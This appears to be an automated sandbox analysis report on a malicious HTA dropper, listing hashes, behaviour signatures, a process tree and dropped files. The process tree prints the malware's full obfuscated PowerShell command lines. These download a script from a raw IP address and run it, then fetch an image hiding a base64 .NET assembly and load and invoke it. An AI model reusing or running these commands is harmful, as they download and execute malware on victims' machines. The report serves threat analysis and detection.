Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
10-12-2024 04:50
Static task
static1
Behavioral task
behavioral1
Sample
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
Resource
win10v2004-20241007-en
General
-
Target
matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
-
Size
193KB
-
MD5
012b83177846ce35f8ae1f6b304ff9c6
-
SHA1
ae49e4e85d2fe80a83d0aa6420c72246e8b5e17e
-
SHA256
264fc1a50a0f37a599e8cb50572d99a78c493da4837930a480253e04a5963fa9
-
SHA512
d48bdf9a62e410254cf3074d7215f922e98d6d1ee0c936fff9c3720a000bdc571758e19a5338b7ad76f70b851aac641a7eaba09b92782d5e57e4921e368d2978
-
SSDEEP
96:4owZw9d6yfaqcQ6PHO/3g9a8GPcQ6PHQ0/3g9a8GBGl/Qcj/WqgO7fpR1MK95tio:4LwzQcHgODpqPvQ
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2628 powershell.exe 6 2024 powershell.exe 8 2024 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2468 cmd.exe 2628 powershell.exe -
pid Process 2024 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 2620 WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2628 powershell.exe 2024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 784 wrote to memory of 2468 784 mshta.exe 31 PID 784 wrote to memory of 2468 784 mshta.exe 31 PID 784 wrote to memory of 2468 784 mshta.exe 31 PID 784 wrote to memory of 2468 784 mshta.exe 31 PID 2468 wrote to memory of 2628 2468 cmd.exe 33 PID 2468 wrote to memory of 2628 2468 cmd.exe 33 PID 2468 wrote to memory of 2628 2468 cmd.exe 33 PID 2468 wrote to memory of 2628 2468 cmd.exe 33 PID 2628 wrote to memory of 2764 2628 powershell.exe 34 PID 2628 wrote to memory of 2764 2628 powershell.exe 34 PID 2628 wrote to memory of 2764 2628 powershell.exe 34 PID 2628 wrote to memory of 2764 2628 powershell.exe 34 PID 2764 wrote to memory of 2156 2764 csc.exe 35 PID 2764 wrote to memory of 2156 2764 csc.exe 35 PID 2764 wrote to memory of 2156 2764 csc.exe 35 PID 2764 wrote to memory of 2156 2764 csc.exe 35 PID 2628 wrote to memory of 2620 2628 powershell.exe 37 PID 2628 wrote to memory of 2620 2628 powershell.exe 37 PID 2628 wrote to memory of 2620 2628 powershell.exe 37 PID 2628 wrote to memory of 2620 2628 powershell.exe 37 PID 2620 wrote to memory of 2024 2620 WScript.exe 38 PID 2620 wrote to memory of 2024 2620 WScript.exe 38 PID 2620 wrote to memory of 2024 2620 WScript.exe 38 PID 2620 wrote to memory of 2024 2620 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c74rfdio.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA68.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDA67.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2156
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"4⤵
- System Location Discovery: System Language Discovery
- System Time Discovery
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5984bfa9be514293d55aa03c1436eb985
SHA147e479086b15304c1c0bf84fec6aa04fb08a40c7
SHA256158262aad4901e79d553db3842be4b6e7e9b7b16f85e4f39527488bb327d9943
SHA5124fce284fefc66080a612758349224834b3870915e757f2da1b29fb348dc8d3420e1c713502dca57da38284d7a3300701fd9680b7f45c5b64bb254af18ef94b8a
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD52ad0f96278cb3d6d9a976e3ee9ec99dd
SHA1cfa0e9e06dd5910d4d2a4e5954bd36309a92a6a9
SHA25648d9bca7c4d570eefbe959ef95973997629e36c8fc8794eab8f4192f8bed460c
SHA5124070edde0a8a006a2ab3ee498b2d94c8d941247ada194a386b3c318b717217d7d75c68a127be6a657ab727b2319bab2831dee210c116f02b0cb55d1e4a0c6636
-
Filesize
7KB
MD59d88195de17351adcf8fd00c483b92d5
SHA155a795579527b2c13cf966c0101607e5269f6e6d
SHA2563600bf6dcd2446be222a247654e854a5e8380640d8f812bb0acbc2516b49ea6b
SHA512d4d15369e61dfe4ea80fe16b33e7f72cb317a432cd968473e6c5dacdc59584b27bddcd4778e316e9b19df897795bc45dfa90be6ce63d8c4862b09a5e81eb1e9a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VIZAHFQCY59O0FFDZSWV.temp
Filesize7KB
MD5b57f81627fb6591e2f31914c6706bcf7
SHA1d3b3cd942dab6d56f5dd649fda501775c812de7e
SHA256600f49a5606ab95059bf50816b91f2cd1127f4b430e7a7470c8ee4195466727a
SHA5128688f642dca8106872ccb4e984ebc6c4ded45eb7360745e37246034639b09d865dee2b91ed8277ae98d7e17aa6892984310858a1f8da19a3a90c2535fa5ae274
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD59368f28ba248b3a6cdf7796a30fb4b04
SHA1b85a713172a5ea0fe110cfb85d933f7315e63036
SHA2569b0923c0898bec5013f38c3f0d9ee099d58fd313834ee269ce379bfafce71ad5
SHA5121c10f4355b46793c028b2e4206d4fdd8e47724fb5fdb85adb56975f1755f57d248d7b777dd1ba38cac69642a149a2e2823457ffe0863f5656f406e8eea512e06
-
Filesize
150KB
MD55ce00a79a9f41d260446bfdcc6267adf
SHA10b2b90beb56c59916b98004b1444698538729822
SHA256efab5d21ed82f610bc5f1734b909a7e5c3a6c2ecebb276dd03b4d5baf8e9b058
SHA512d4de7fe61f23ce7524ed3123319ac93f33ae1806bd426045ca9df1fa9ee82cca58aa314711bbde6a6ffa2eee98dc20cc5e4d80d2ec7abb028be0639944714fee
-
Filesize
652B
MD53a0c31c524e7b8e173bfa960713f799d
SHA1e5edd4464c4ffd4d937a402a803304083e24cb71
SHA256c86825d09862c7d7f737f65c83bf843da1fca6770625e055142c02877b6dff96
SHA512a85a99bdac8665ed400ba6fb54418318ed3c82c5958227f830ad05b44bf9c0257dbae63cc995ae5ca77d6bcbb22cc53db3ac915c3ff68813b2c5c8e5e6fa72ca
-
Filesize
482B
MD58c16810a9a149ee7b288951c6afdfcd1
SHA14322374e8321e8a97ab6af0b6a23bb3f016c9713
SHA25695c610a9e86321d9dea63594d0d9c9cb72c5dc56edf8f78f25736a76cac0d949
SHA5120e37863619591fdd2cde0ae8ead71ef856695e299e9bb76266f1b40588d3f7e26521f7cb0bedcfa2a0809224dc02b076d4a07a1d247b23adb30e79ca5f626564
-
Filesize
309B
MD55b8c76d297434d8649f4293780461ed0
SHA1fcba257b000676382c5d9df2ce9dd5c8e25d6e83
SHA25613f2c7da2e4072f2a35ecd9dfdfdc043337bda0cf738f0d67cbf43051f09d738
SHA512c5d6e10514c151c2629974b0ee0f0ec1d69b35f2094bf3ff1aa4a130deef6cffa4eb09735bbb63f13bd3eb49b057b14678ea568d4c2b294e36255e9735d41f16